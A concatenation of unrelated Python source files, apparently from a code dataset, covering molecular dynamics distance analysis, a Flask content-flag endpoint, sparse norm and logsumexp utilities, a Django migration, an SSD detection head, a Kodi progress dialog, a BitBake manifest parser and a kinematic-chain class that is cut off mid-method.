    select_group3 = u.selectAtoms("backbone and (resnum 50 or resnum 51 or resnum 149 or resnum 150)")
    select_group4 = u.selectAtoms("backbone and (resnum 25 or resnum 124)")
    # echo the selected atoms so the selections can be sanity-checked
    for i in select_group1:
        print "Loop1 ", i
    for i in select_group2:
        print "Loop2 ", i
    for i in select_group4:
        print "ASP ", i
    # per-frame distance traces
    COM_distance = []
    COM_distance_ASP = []
    COM_distance_ASP1 = []
    COM_distance_ASP2 = []
    # running extrema (and the frames where they occur), one max/min pair
    # per trace; 0 and 100 act as -inf/+inf sentinels in Angstroms
    max_dist = 0
    index = 0
    min_dist = 100
    index_min = 0
    max_dist_1 = 0
    index_1 = 0
    min_dist_1 = 100
    index_min_1 = 0
    max_dist_2 = 0
    index_2 = 0
    min_dist_2 = 100
    index_min_2 = 0
    max_dist_3 = 0
    index_3 = 0
    min_dist_3 = 100
    index_min_3 = 0
    #group1_COM = select_group1.centerOfMass()
    #group2_COM = select_group2.centerOfMass()
    #print group1_COM
    #print group2_COM
    #print np.sqrt(np.dot(group1_COM-group2_COM, group1_COM-group2_COM))
    #print np.linalg.norm(group1_COM - group2_COM)
    for i in u.trajectory:
        # selections re-evaluate their coordinates at the current frame
        group1_COM = select_group1.centerOfMass()
        group2_COM = select_group2.centerOfMass()
        dist = np.linalg.norm(group1_COM - group2_COM)
        COM_distance.append(dist)
        if dist > max_dist:
            max_dist = dist
            index = i.frame
        if dist < min_dist:
            min_dist = dist
            index_min = i.frame
        group3_COM = select_group3.centerOfMass()
        group4_COM = select_group4.centerOfMass()
        dist1 = np.linalg.norm(group3_COM - group4_COM)
        COM_distance_ASP.append(dist1)
        if dist1 > max_dist_1:
            max_dist_1 = dist1
            index_1 = i.frame
        if dist1 < min_dist_1:
            min_dist_1 = dist1
            index_min_1 = i.frame
        dist2 = np.linalg.norm(group1_COM - group4_COM)
        dist3 = np.linalg.norm(group2_COM - group4_COM)
        COM_distance_ASP1.append(dist2)
        COM_distance_ASP2.append(dist3)
        if dist2 > max_dist_2:
            max_dist_2 = dist2
            index_2 = i.frame
        if dist2 < min_dist_2:
            min_dist_2 = dist2
            index_min_2 = i.frame
        if dist3 > max_dist_3:
            max_dist_3 = dist3
            index_3 = i.frame
        if dist3 < min_dist_3:
            min_dist_3 = dist3
            index_min_3 = i.frame
    print 'Max interloop distance: ', max_dist, index
    print 'Min interloop distance: ', min_dist, index_min
    print 'Max loops-ASP distance: ', max_dist_1, index_1
    print 'Min loops-ASP distance: ', min_dist_1, index_min_1
    print 'Max loop1-ASP distance: ', max_dist_2, index_2
    print 'Min loop1-ASP distance: ', min_dist_2, index_min_2
    print 'Max loop2-ASP distance: ', max_dist_3, index_3
    print 'Min loop2-ASP distance: ', min_dist_3, index_min_3
    return COM_distance, COM_distance_ASP, COM_distance_ASP1, COM_distance_ASP2
coil_distance, ASP_distance, ASP_distance1, ASP_distance2 = calculate_dists('structure.pdb', 'equ.dcd')
x_vals = [x / 10 for x in range(0, len(coil_distance))]
plt.plot(x_vals, coil_distance, linewidth=0.5)
#leg = plt.legend(ncol=3, loc=9, fancybox=True)
#leg.get_frame().set_alpha(0.5)
plt.xlabel('Time / ns')
plt.ylabel(ur'Loop COM distance / $\AA$')
plt.axhline(y=9.84, linewidth=1, color = 'red')
plt.axhline(y=11.11, linewidth=1, color = 'green')
plt.savefig('coil_COMdistance.png', dpi=300)
plt.close()
plt.plot(x_vals, ASP_distance, linewidth=0.5)
plt.plot(x_vals, ASP_distance1, linewidth=0.5)
plt.plot(x_vals, ASP_distance2, linewidth=0.5)
print 'Loop1 average: ', np.average(ASP_distance1[500:]), np.std(ASP_distance1[500:])
print 'Loop2 average: ', np.average(ASP_distance2[500:]), np.std(ASP_distance2[500:])
plt.xlabel('Time / ns')
plt.ylabel(ur'Loop COM distance / $\AA$')
plt.axhline(y=21.29, linewidth=1, color = '#C45AEC', label='PR20')
plt.axhline(y=15.18, linewidth=1, color = '#C45AEC')
plt.axhline(y=20.36, linewidth=1, color = '#EAC117', label='PR')
plt.axhline(y=15.11, linewidth=1, color = '#EAC117')
plt.axhline(y=np.average(ASP_distance1), linewidth=1, color = 'green', label='Loop1 average')
plt.axhline(y=np.average(ASP_distance2), linewidth=1, color = 'red', label='Loop2 average')
leg = plt.legend(fancybox=True, loc=2, framealpha=0.5)
#leg.get_frame().set_alpha(0.5)
plt.savefig('ASP_COMdistance.png', dpi=300)
plt.close()
| 4,687 | 1,881 |
import datetime as dt
import json
from flask_restful import (
Resource,
reqparse,
)
from flask_security import current_user
from marshmallow_sqlalchemy import ModelSchema
from .utils import auth_required
from .. import db
from ..core.utils import log_exception
from ..models import ContentFlag
class FlagSchema(ModelSchema):
    """Marshmallow schema (de)serializing ContentFlag rows, foreign keys
    included."""

    class Meta:
        model = ContentFlag
        include_fk = True
# Module-level schema and request parser shared by the resource below.
flag_schema = FlagSchema()

parser = reqparse.RequestParser()
parser.add_argument('video_id', type=str, required=True)
parser.add_argument('flag_type', type=str)  # only required for PUT
class FlagApi(Resource):
    """REST endpoint for reading and creating per-user content flags."""

    method_decorators = [auth_required]

    def get(self):
        """Return the current user's flag for ``video_id``.

        Responds with the serialized flag, or an empty payload with
        status 404 when no flag exists.
        """
        args = parser.parse_args()
        flag = \
            (db.session.query(ContentFlag)
             .filter(ContentFlag.video_id == args['video_id'],
                     ContentFlag.user_id == current_user.id)
             .first())
        return flag_schema.dump(flag).data or ({}, 404)

    def put(self):
        """Create a flag of ``flag_type`` on ``video_id`` for the current user.

        Returns 400 for an unknown flag type and 500 on storage errors.
        """
        args = parser.parse_args()
        try:
            # Bug fix: validation previously used `assert`, which is
            # stripped under `python -O`; an explicit check keeps the
            # 400 response in optimized runs.
            if args['flag_type'] not in (
                    'xxx', 'hate', 'scam', 'spam', 'plagiarism'):
                raise ValueError('Invalid flag')
            flag = ContentFlag(
                user_id=current_user.id,
                video_id=args['video_id'],
                flag_type=args['flag_type'],
                created_at=dt.datetime.utcnow(),
            )
            db.session.add(flag)
            db.session.commit()
        except (AssertionError, ValueError) as e:
            log_exception()
            return dict(message=str(e)), 400
        except Exception as e:
            log_exception()
            return dict(message=str(e)), 500
        return flag_schema.dump(flag).data
| 1,692 | 492 |
# -*- coding: utf-8 -*-
"""
Copyright: Frank Nussbaum (frank.nussbaum@uni-jena.de)
This file contains various functions used in the module including
- sparse norms and shrinkage operators
- a stable logsumexp implementation
- array printing-method that allows pasting the output into Python code
"""
import numpy as np
#################################################################################
# norms and shrinkage operators
#################################################################################
# Prefer the fast Cython shrinkage kernels; fall back to the pure-Python
# implementations defined below when the extension has not been built.
try:
    # the following requires setup
    # import os
    # os.system('python cyshrink/setup.py build_ext --inplace')
    # TODO(franknu): configure n_threads/interface
    from cyshrink.shrink.shrink import grp as grp_soft_shrink
    from cyshrink.shrink.shrink import grp_weight as grp_soft_shrink_weight
    print('successfully imported shrink.shrink')
except Exception as e:
    print(e)
    # from cyshrink.shrink.shrink import grp_weight as grp_soft_shrink_weight2
    # naive and slow implementations
    print('''
Failed to import Cython shrink functions, setup is required...
using slower native Python functions instead''')
def grp_soft_shrink(mat, tau, glims, off=False):
    """Wrapper for grp_soft_shrink_weight with weights=None.

    Bug fix: the ``off`` argument was previously ignored (hard-coded to
    ``off=False``); it is now forwarded to the weighted implementation.
    """
    return grp_soft_shrink_weight(mat, tau, glims, off=off, weights=None)
def grp_soft_shrink_weight(mat, tau,
                           glims,
                           off=False,
                           weights=None):
    """
    calculate (group-)soft-shrinkage.
    Args:
        mat (np.array): matrix.
        tau (float): non-negative shrinkage parameter.
        off (bool): if True, do not shrink diagonal entries.
        glims: group delimiters (cumulative sizes of groups).
        weights (optional): weights for weighted l_{1,2} norm/shrinkage.
    Returns:
        tuple: shrunken matrix, (group) l_{1,2}-norm of shrunken matrix.
    Note:
        this code could be made much faster
        (by parallizing loops, efficient storage access).
    """
    shrinkednorm = 0
    # if glims is None:
    n_groups = len(glims) - 1
    if glims[-1] == n_groups:  # each group has size 1
        # scalar case: plain (weighted) elementwise soft-thresholding
        tmp = np.abs(mat)
        if not weights is None:  # weighted l1-norm
            # tmp = np.multiply(tmp, weights).flatten
            tmp -= tau * weights
        else:
            tmp -= tau
        # clip tiny and negative magnitudes to exactly zero
        tmp[tmp < 1e-25] = 0
        shrinked = np.multiply(np.sign(mat), tmp)
        l1norm = np.sum(np.abs(shrinked.flatten()))
        if off:
            # diagonal stays unshrunk: restore it and drop it from the norm
            l1norm -= np.sum(np.abs(np.diag(shrinked)))
            shrinked -= np.diag(np.diag(shrinked))
            shrinked += np.diag(np.diag(mat))
        return shrinked, l1norm
    # group soft shrink
    # NOTE(review): `weights` is indexed per group pair (i, j) below, but
    # this default is sized like `mat` -- that only works because the
    # default is all-ones; confirm the expected weights shape.
    if weights is None:
        weights = np.ones(mat.shape)  # TODO(franknu): improve style
    tmp = np.empty(mat.shape)
    for i in range(n_groups):
        for j in range(n_groups):
            # TODO(franknu): use symmetry
            group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
            if (i == j) and off:
                # copy the diagonal block through untouched
                tmp[glims[i]:glims[i + 1], glims[i]:glims[i + 1]] = group
                continue
            gnorm = np.linalg.norm(group, 'fro')
            w_ij = tau * weights[i,j]
            if gnorm <= w_ij:
                # whole group falls below the threshold: zero it out
                tmp[glims[i]:glims[i + 1],
                    glims[j]:glims[j + 1]] = np.zeros(group.shape)
            else:
                # scale the group towards zero and accumulate its
                # (weighted) Frobenius norm after shrinkage
                tmp[glims[i]:glims[i+1], glims[j]:glims[j+1]] = \
                    group * (1 - w_ij / gnorm)
                shrinkednorm += weights[i,j] * (1 - w_ij / gnorm) * gnorm
    return tmp, shrinkednorm
def l21norm(mat, glims=None, off=False, weights=None):
    """
    calculate l_{1,2}-norm.
    Args:
        mat (np.array): matrix (assumed symmetric when groups are used).
        glims: group delimiters (cumulative sizes of groups); if None,
            the plain elementwise l1-norm is computed instead.
        off (bool): if True, exclude diagonal entries/groups.
        weights (optional): weights for weighted l_{1,2} norm.
    Returns:
        float: (group) l_{1,2}-norm.
    """
    if glims is None:
        # calculate regular l1-norm
        tmp = np.abs(mat)  # tmp is copy, can do this inplace by specifying out
        if weights is not None:  # weighted l1-norm
            # bug fix: `.flatten` was referenced without being called, so
            # `tmp` became a bound method and np.sum() failed; the sum
            # works on the 2-D array directly, no flattening needed
            tmp = np.multiply(tmp, weights)
        tmp = np.sum(tmp)
        if off:
            tmp -= np.sum(np.diag(np.abs(mat)))
        return tmp
    n_groups = len(glims) - 1
    l21sum = 0
    # sum Frobenius norms of the strict lower-triangle groups, then
    # double the result (relies on symmetry of `mat`)
    if weights is None:
        for i in range(n_groups):
            for j in range(i):
                group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
                l21sum += np.linalg.norm(group, 'fro')
    else:
        for i in range(n_groups):
            for j in range(i):
                group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
                l21sum += weights[i,j] * np.linalg.norm(group, 'fro')
    l21sum *= 2  # use symmetry
    if not off:
        # add the (unweighted) diagonal groups
        for i in range(n_groups):
            group = mat[glims[i]:glims[i + 1], glims[i]:glims[i + 1]]
            l21sum += np.linalg.norm(group, 'fro')
    return l21sum
###############################################################################
# stable implementation of logsumexp etc.
###############################################################################
#from scipy.special import logsumexp
def _exp_shiftedmax(array, axis=None):
"""calculate exponentials of array shifted by its max, avoiding overflow
by subtracting maximum before"""
a_max = np.amax(array, axis=axis, keepdims=True)
if a_max.ndim > 0:
a_max[~np.isfinite(a_max)] = 0
elif not np.isfinite(a_max):
a_max = 0
# print((a-a_max).shape)
exp_shiftedamax = np.exp(array - a_max)
# last line: a_max is repeated columnwise (if axis = 1)
return exp_shiftedamax, a_max
def logsumexp(array, axis=None, keepdims=True):
    """Compute log(sum(exp(array))) along *axis*, numerically stably.

    Args:
        array (np.array): input values.
        axis (int): reduction axis.
        keepdims (bool): passed through to np.sum.

    Returns:
        np.array: the stabilized logsumexp.

    Note:
        Adaptation of logsumexp in scipy.special (v1.1.0); the max-shift
        trick (see ``_exp_shiftedmax``) is inlined here.
    """
    peak = np.amax(array, axis=axis, keepdims=True)
    if peak.ndim > 0:
        peak[~np.isfinite(peak)] = 0
    elif not np.isfinite(peak):
        peak = 0
    shifted_exp = np.exp(array - peak)
    # suppress warnings about log of zero
    with np.errstate(divide='ignore'):
        result = np.log(np.sum(shifted_exp, axis=axis, keepdims=keepdims))
    if not keepdims:
        peak = np.squeeze(peak, axis=axis)
    result += peak
    return result
def _logsumexp_and_conditionalprobs(array):
"""return logsumexp and conditional probabilities from array a
that has the same shape as the discrete data in dummy-representation"""
exp_shifted, a_max = _exp_shiftedmax(array, axis=1)
summed = np.sum(exp_shifted, axis=1, keepdims=True) # entries always > 1
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
out_logsumexp = np.log(summed)
out_logsumexp += a_max
# node conditional probabilities
size = array.shape[1]
out_conditionalprobs = np.divide(exp_shifted,
np.dot(summed, np.ones((1, size))))
# unstable = np.log(np.sum(np.exp(a), axis = 1)).reshape((a.shape[0], 1))
# diff = unstable - out_logsumexp
# print (unstable)
# for i in range(unstable.shape[0]):
# if abs(diff[i, 0]) > 10e-5:
# print('a', a[i, :])
# print('unstable', unstable[i, 0])
# print('stable', out_logsumexp[i, 0])
# break
# assert np.linalg.norm(unstable - out_logsumexp) < 10E-5
# print(out_logsumexp)
# print(out_logsumexp[:1, 0])
# assert 1 == 0
out_logsumexp = np.squeeze(out_logsumexp)
return out_logsumexp, out_conditionalprobs
def _logsumexp_condprobs_red(array):
"""normalization and conditional probabilities for reduced levels,
a ... two-dimensional array"""
a_max = np.amax(array, axis=1, keepdims=True)
a_max = np.maximum(a_max, 0)
# last line: account for missing column with probs exp(0) for 0th level
if a_max.ndim > 0:
a_max[~np.isfinite(a_max)] = 0
elif not np.isfinite(a_max):
a_max = 0
exp_shifted = np.exp(array - a_max) # a_max is repeated columnwise (axis=1)
# calc column vector s of (shifted) normalization sums
# note that entries always > 1, since one summand in each col is exp(0)
summed = np.sum(exp_shifted, axis=1, keepdims=True)
summed += np.exp(-a_max) # add values from missing 0th column
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
out_logsumexp = np.log(summed)
out_logsumexp += a_max
out_logsumexp = np.squeeze(out_logsumexp)
# node conditional probabilities, required for gradient
size = array.shape[1]
out_conditionalprobs = np.divide(exp_shifted,
np.dot(summed, np.ones((1, size))))
# note: log of this is not stable if probabilities close to zero
# - use logsumexp instead for calculating plh value
return out_logsumexp, out_conditionalprobs
###############################################################################
# some conversion functions for representations of discrete data
###############################################################################
def dummy_to_index_single(dummy_x, sizes):
    """Convert one dummy-coded observation to index representation.

    Args:
        dummy_x: flat 0/1 vector of length ``sum(sizes)``.
        sizes: number of levels of each categorical variable.

    Returns:
        np.ndarray with the selected level index of each variable.
    """
    offset = 0
    # `np.int` was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin `int` yields the same default integer dtype
    ind = np.empty(len(sizes), dtype=int)
    for i, size_r in enumerate(sizes):
        for j in range(size_r):
            if dummy_x[offset + j] == 1:
                ind[i] = j
                break
        offset += size_r
    return ind
def dummy_to_index(dummy_data, sizes):
    """Convert dummy-coded data (one row per observation) to index
    representation.

    Args:
        dummy_data: (n_data, sum(sizes)) 0/1 array.
        sizes: number of levels of each categorical variable.

    Returns:
        (n_data, len(sizes)) integer array of selected level indices.
    """
    n_data, ltot = dummy_data.shape
    assert ltot == sum(sizes)
    n_cat = len(sizes)
    # `np.int` was removed in NumPy 1.24; builtin `int` is equivalent
    index_data = np.empty((n_data, n_cat), dtype=int)
    for k in range(n_data):
        offset = 0
        for i, size_r in enumerate(sizes):
            for j in range(size_r):
                # bug fix: the row index `k` was missing here
                # (`dummy_data[offset + j]`), which indexed whole rows
                # and raised ValueError for data with more than one row
                if dummy_data[k, offset + j] == 1:
                    index_data[k, i] = j
                    break
            offset += size_r
    return index_data
#def dummypadded_to_unpadded(dummy_data, n_cat):
# """remove convert dummy to index representation"""
# unpadded = np.empty(n_cat)
# for i,x in enumerate(dummy_data):
# if i % 2 == 1:
# unpadded[i // 2] = x
# return unpadded
def index_to_dummy(idx, glims, ltot):
    """Expand an index representation into a 0/1 dummy vector of length
    *ltot*, using *glims* as the per-variable column offsets."""
    encoded = np.zeros(ltot)
    for var, level in enumerate(idx):
        encoded[glims[var] + level] = 1
    return encoded
def dummy2dummyred(dummy_data, glims):
    """Drop each variable's 0th-level column from *dummy_data*, yielding
    the reduced dummy representation."""
    zeroth_columns = glims[:-1]
    return np.delete(dummy_data, zeroth_columns, axis=1)
###############################################################################
# testing utilities
###############################################################################
def strlistfrom(array, rnd=2):
    """Render *array* as an ``np.array([...])`` literal (rounded to *rnd*
    decimals) that can be pasted back into Python code."""
    rendered = np.array2string(array, precision=rnd, separator=',')
    # strip newlines and spaces so the literal fits on one line
    compact = rendered.translate({ord(ch): None for ch in '\n '})
    return 'np.array(' + compact + ')'
def tomatlabmatrix(mat):
    """Print *mat* formatted so it can be pasted into MATLAB code."""
    nrows, ncols = mat.shape
    rows = []
    for r in range(nrows):
        cells = ''.join(str(mat[r, c]) + ' ' for c in range(ncols))
        rows.append('[' + cells + ']')
    print('[' + ';'.join(rows) + ']')
def frange(start, stop, step):
    """Yield floats from *start* (inclusive) up to *stop* (exclusive) in
    increments of *step* (subject to float accumulation error)."""
    current = start
    while current < stop:
        yield current
        current += step
if __name__ == '__main__':
    # Smoke test: round-trip index <-> dummy conversion, then run the
    # reduced logsumexp/conditional-probability helper on a small matrix.
    SIZES = [2, 2, 2]
    GLIMS = [0, 2, 4, 6]
    LTOT = 6
    IND = [0, 0, 1]
    DUMMY = index_to_dummy(IND, GLIMS, LTOT)
    IND2 = dummy_to_index_single(DUMMY, SIZES)
    MAT = np.arange(6).reshape((3, 2))
    RES = _logsumexp_condprobs_red(MAT)
    print(RES)
    # res should be
    # (array([ 1.55144471,  3.34901222,  5.31817543]), array([[ 0.21194156,  0.57611688],
    #        [ 0.25949646,  0.70538451],
    #        [ 0.26762315,  0.72747516]]))
| 13,231 | 4,663 |
# Generated by Django 2.2.4 on 2020-02-07 18:11
from django.db import migrations, models
import django.db.models.deletion
import jsonfield.fields
class Migration(migrations.Migration):
    # Auto-generated schema migration: creates the Course model and links
    # the existing Daily and Group models to it via foreign keys.

    dependencies = [
        ('authorization', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Course',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=100)),
                # free-form pricing data stored as JSON
                ('price', jsonfield.fields.JSONField(blank=True, null=True)),
            ],
        ),
        migrations.AlterField(
            model_name='daily',
            name='course',
            field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='authorization.Course'),
        ),
        migrations.AddField(
            model_name='group',
            name='course',
            # nullable so existing Group rows migrate without a course
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='authorization.Course'),
        ),
    ]
| 1,091 | 334 |
import torch.nn as nn
import torch.nn.functional as F
from ssd.modeling.anchor import make_anchor_generator
from ssd.utils import bbox
from .inference import make_post_processor
from .loss import make_loss_evaluator
from .predictor import make_ssd_predictor
class SSDHead(nn.Module):
    """SSD detection head.

    In training mode it returns the classification/regression losses; in
    eval mode it decodes box predictions against the generated anchors
    and returns post-processed detections.
    """

    def __init__(self, cfg, in_channels):
        super(SSDHead, self).__init__()
        num_classes = cfg.MODEL.NUM_CLASSES
        # two default anchors per location plus two per configured ratio
        anchors_per_location = [
            2 * len(ratios) + 2
            for ratios in cfg.MODEL.ANCHOR.ASPECT_RATIOS
        ]
        self.predictor = make_ssd_predictor(
            cfg, in_channels, anchors_per_location, num_classes)
        self.loss_evaluator = make_loss_evaluator(cfg)
        self.post_processor = make_post_processor(cfg)
        self.anchor_generator = make_anchor_generator(cfg)
        self.center_variance = cfg.MODEL.CENTER_VARIANCE
        self.size_variance = cfg.MODEL.SIZE_VARIANCE
        self.size = cfg.INPUT.SIZE

    def forward(self, features, targets=None):
        cls_logits, bbox_pred = self.predictor(features)
        if not self.training:
            return self._forward_test(cls_logits, bbox_pred)
        return self._forward_train(cls_logits, bbox_pred, targets)

    def _forward_train(self, cls_logits, bbox_pred, targets):
        """Return (empty detections, loss dict) for a training step."""
        gt_boxes, gt_labels = targets[0], targets[1]
        cls_loss, reg_loss = self.loss_evaluator(
            cls_logits, bbox_pred, gt_labels, gt_boxes)
        return {}, {'cls_loss': cls_loss, 'reg_loss': reg_loss}

    def _forward_test(self, cls_logits, bbox_pred):
        """Return (post-processed detections, empty loss dict)."""
        anchors = self.anchor_generator.generate_anchors().to(cls_logits.device)
        scores = F.softmax(cls_logits, dim=2)
        decoded = bbox.convert_locations_to_boxes(
            bbox_pred,
            anchors,
            self.center_variance,
            self.size_variance,
        )
        detections = self.post_processor(bbox.xywh2xyxy(decoded), scores)
        return detections, {}
| 2,081 | 706 |
"""Find max element"""
#!/usr/bin/env python3
"""Find max element"""
import random
from collections import Counter
List = [random.randrange(1, 15) for num in range(10)]
def most_frequent(List):
occurence_count = Counter(List)
return occurence_count.most_common()
frequent_number, frequency = most_frequent(List)[0]
print(f"List {List}: \nMost frequent number {frequent_number} \nFrequency: {frequency}")
| 415 | 141 |
# -*- coding: utf-8 -*-
import xbmcgui
class DialogProgress:
    """Wrapper around xbmcgui.DialogProgress that caches heading/lines/percent
    so partial updates re-send the complete dialog state."""

    def __init__(self):
        self.dlg = xbmcgui.DialogProgress()
        self.__reset__()

    def __reset__(self):
        # Forget all cached dialog state.
        self.head = ''
        self.firstline = ''
        self.secondline = None
        self.thirdline = None
        self.percent = 0

    def isCanceled(self):
        """True when the user pressed cancel on the underlying dialog."""
        return self.dlg.iscanceled()

    def _remember(self, percent, firstline, secondline, thirdline):
        # Only truthy values overwrite the cached state (so percent=0 or an
        # empty string leaves the previous value in place).
        if firstline:
            self.firstline = firstline
        if secondline:
            self.secondline = secondline
        if thirdline:
            self.thirdline = thirdline
        if percent:
            self.percent = percent

    def _lines(self):
        # A third line is only passed along when a second line is present too.
        if self.secondline and self.thirdline:
            return [self.firstline, self.secondline, self.thirdline]
        if self.secondline:
            return [self.firstline, self.secondline]
        return [self.firstline]

    def update(self, percent=None, firstline=None, secondline=None, thirdline=None):
        """Refresh the dialog, merging new values into the cached state."""
        self._remember(percent, firstline, secondline, thirdline)
        self.dlg.update(self.percent, *self._lines())

    def create(self, head, firstline=None, secondline=None, thirdline=None):
        """Open the dialog with the given heading and cached/merged lines."""
        self._remember(None, firstline, secondline, thirdline)
        self.dlg.create(head, *self._lines())

    def close(self):
        """Close the dialog and clear the cached state."""
        self.dlg.close()
        self.__reset__()
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
#
# Copyright (C) 2003, 2004 Chris Larson
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os, sys
import bb, bb.data
def getfields(line):
    """Split one manifest line into a dict keyed by field name.

    Fields are whitespace-separated and positional; a literal "-" (or a
    missing trailing field) leaves that entry as None.

    Parameters
    ----------
    line : str or None

    Returns
    -------
    dict mapping every field name to a string or None, or None when the
    line is empty/blank.
    """
    if not line:
        return None
    values = line.split()
    if not values:
        return None
    fieldmap = ("pkg", "src", "dest", "type", "mode", "uid", "gid",
                "major", "minor", "start", "inc", "count")
    fields = dict.fromkeys(fieldmap)
    # zip() stops at the shorter sequence, replacing the original loop that
    # swallowed IndexError; it also removes the Python-2-only xrange.
    for name, value in zip(fieldmap, values):
        if value != '-':
            fields[name] = value
    return fields
def parse (mfile, d):
    """Read a manifest from the open file *mfile*.

    Blank lines and '#' comments are skipped; every other line is parsed
    with getfields().  Returns the list of field dicts.
    """
    entries = []
    while True:
        line = mfile.readline()
        if not line:
            # EOF
            break
        if line.startswith("#"):
            continue
        fields = getfields(line)
        if fields:
            entries.append(fields)
    return entries
def emit (func, manifest, d):
    """Render *manifest* as shell commands for task *func*.

    Entries that do not apply to the task (emit_line returns a falsy value)
    are skipped; each remaining command ends with a newline.
    """
    rendered = []
    for entry in manifest:
        cmd = emit_line(func, entry, d)
        if cmd:
            rendered.append(cmd + "\n")
    return "".join(rendered)
def mangle (func, line, d):
    """Rewrite a manifest entry's src/dest paths for the given task.

    Parameters
    ----------
    func : str -- one of "do_install", "do_populate", "do_stage"
    line : dict -- manifest entry as produced by getfields()
    d : bb datastore used to expand variables in the src path

    Returns
    -------
    A shallow copy of *line* with rewritten "src"/"dest", or None when the
    entry does not apply to this task.
    """
    import copy
    newline = copy.copy(line)
    src = bb.data.expand(newline["src"], d)
    if src:
        if not os.path.isabs(src):
            src = "${WORKDIR}/" + src
    dest = newline["dest"]
    if not dest:
        return
    if dest.startswith("/"):
        dest = dest[1:]
    # BUG FIX: the original used `func is "do_install"` etc.  `is` tests
    # object identity, not equality, and is unreliable for strings; use `==`.
    if func == "do_install":
        dest = "${D}/" + dest
    elif func == "do_populate":
        dest = "${WORKDIR}/install/" + newline["pkg"] + "/" + dest
    elif func == "do_stage":
        # Map install locations onto the staging area.
        varmap = {}
        varmap["${bindir}"] = "${STAGING_DIR}/${HOST_SYS}/bin"
        varmap["${libdir}"] = "${STAGING_DIR}/${HOST_SYS}/lib"
        varmap["${includedir}"] = "${STAGING_DIR}/${HOST_SYS}/include"
        varmap["${datadir}"] = "${STAGING_DATADIR}"
        matched = False
        for key in varmap.keys():
            if dest.startswith(key):
                dest = varmap[key] + "/" + dest[len(key):]
                matched = True
        if not matched:
            # Destination outside the known staging roots: drop the entry.
            return
    else:
        # Unknown task: nothing to emit.
        return
    newline["src"] = src
    newline["dest"] = dest
    return newline
def emit_line (func, line, d):
    """Render a single manifest entry as install command(s) for task *func*.

    Returns the shell command string, "" for entry types other than
    directories ("d") and files ("f"), or None when the entry does not
    apply (mangle rejected it, or a file entry has no source).
    """
    import copy
    entry = mangle(func, copy.deepcopy(line), d)
    if not entry:
        return None
    # Renamed from `str`/`type` to avoid shadowing the builtins.
    ftype = entry["type"]
    mode = entry["mode"]
    src = entry["src"]
    dest = entry["dest"]
    cmd = ""
    # BUG FIX: the original compared with `ftype is "d"` -- identity, not
    # equality, which is unreliable for strings parsed from a file; use `==`.
    if ftype == "d":
        cmd = "install -d "
        if mode:
            cmd += "-m %s " % mode
        cmd += dest
    elif ftype == "f":
        if not src:
            return None
        if dest.endswith("/"):
            # Trailing slash: create the directory, then install into it.
            cmd = "install -d "
            cmd += dest + "\n"
            cmd += "install "
        else:
            cmd = "install -D "
        if mode:
            cmd += "-m %s " % mode
        cmd += src + " " + dest
    return cmd
| 3,828 | 1,234 |
'''
Classes implementing various kinematic chains. This module is perhaps mis-located
as it does not have a direct BMI role but rather contains code which is useful in
supporting BMI control of kinematic chains.
This code depends on the 'robot' module (https://github.com/sgowda/robotics_toolbox)
'''
import numpy as np
try:
import robot
except ImportError:
import warnings
warnings.warn("The 'robot' module cannot be found! See https://github.com/sgowda/robotics_toolbox")
import matplotlib.pyplot as plt
from collections import OrderedDict
import time
pi = np.pi
class KinematicChain(object):
    '''
    Arbitrary kinematic chain (i.e. spherical joint at the beginning of
    each joint)
    '''
    def __init__(self, link_lengths=None, name='', base_loc=None, rotation_convention=1):
        '''
        Construct a kinematic chain.

        Parameters
        ----------
        link_lengths : iterable, optional
            Lengths of all the distances between joints; defaults to [10., 10.]
        name : str, optional
            Name forwarded to the underlying robot.SerialLink object
        base_loc : np.array of shape (3,), optional
            Location of the base of the kinematic chain in an "absolute"
            reference frame; defaults to the origin.
        rotation_convention : 1 or -1, optional
            Sign convention applied to every joint angle.
        '''
        # None sentinels avoid the shared-mutable-default-argument pitfall
        # (the original used a list and an ndarray as defaults).
        if link_lengths is None:
            link_lengths = [10., 10.]
        if base_loc is None:
            base_loc = np.array([0., 0., 0.])
        self.n_links = len(link_lengths)
        self.link_lengths = link_lengths
        self.base_loc = base_loc
        assert rotation_convention in [-1, 1]
        self.rotation_convention = rotation_convention
        # Create the robot object. Override for child classes with different types of joints
        self._init_serial_link()
        self.robot.name = name

    def _init_serial_link(self):
        # Three D-H links per physical link emulate a spherical joint.
        links = []
        for link_length in self.link_lengths:
            link1 = robot.Link(alpha=-pi/2)
            link2 = robot.Link(alpha=pi/2)
            link3 = robot.Link(d=-link_length)
            links += [link1, link2, link3]
        # By convention, we start the arm in the XY-plane
        links[1].offset = -pi/2
        self.robot = robot.SerialLink(links)

    def calc_full_joint_angles(self, joint_angles):
        '''
        Override in child classes to perform static transforms on joint angle inputs. If some
        joints are always static (e.g., if the chain only operates in a plane)
        this can avoid cluttering joint angle specifications.
        '''
        return self.rotation_convention * joint_angles

    def full_angles_to_subset(self, joint_angles):
        '''Inverse of calc_full_joint_angles; identity for the generic chain.'''
        return joint_angles

    def plot(self, joint_angles):
        '''Render the chain at the given configuration via the robot toolbox.'''
        joint_angles = self.calc_full_joint_angles(joint_angles)
        self.robot.plot(joint_angles)

    def forward_kinematics(self, joint_angles, **kwargs):
        '''
        Calculate forward kinematics using D-H parameter convention.

        Returns
        -------
        (t, allt) : endpoint transform and per-link transforms from
            robot.SerialLink.fkine; both are also cached on self.
        '''
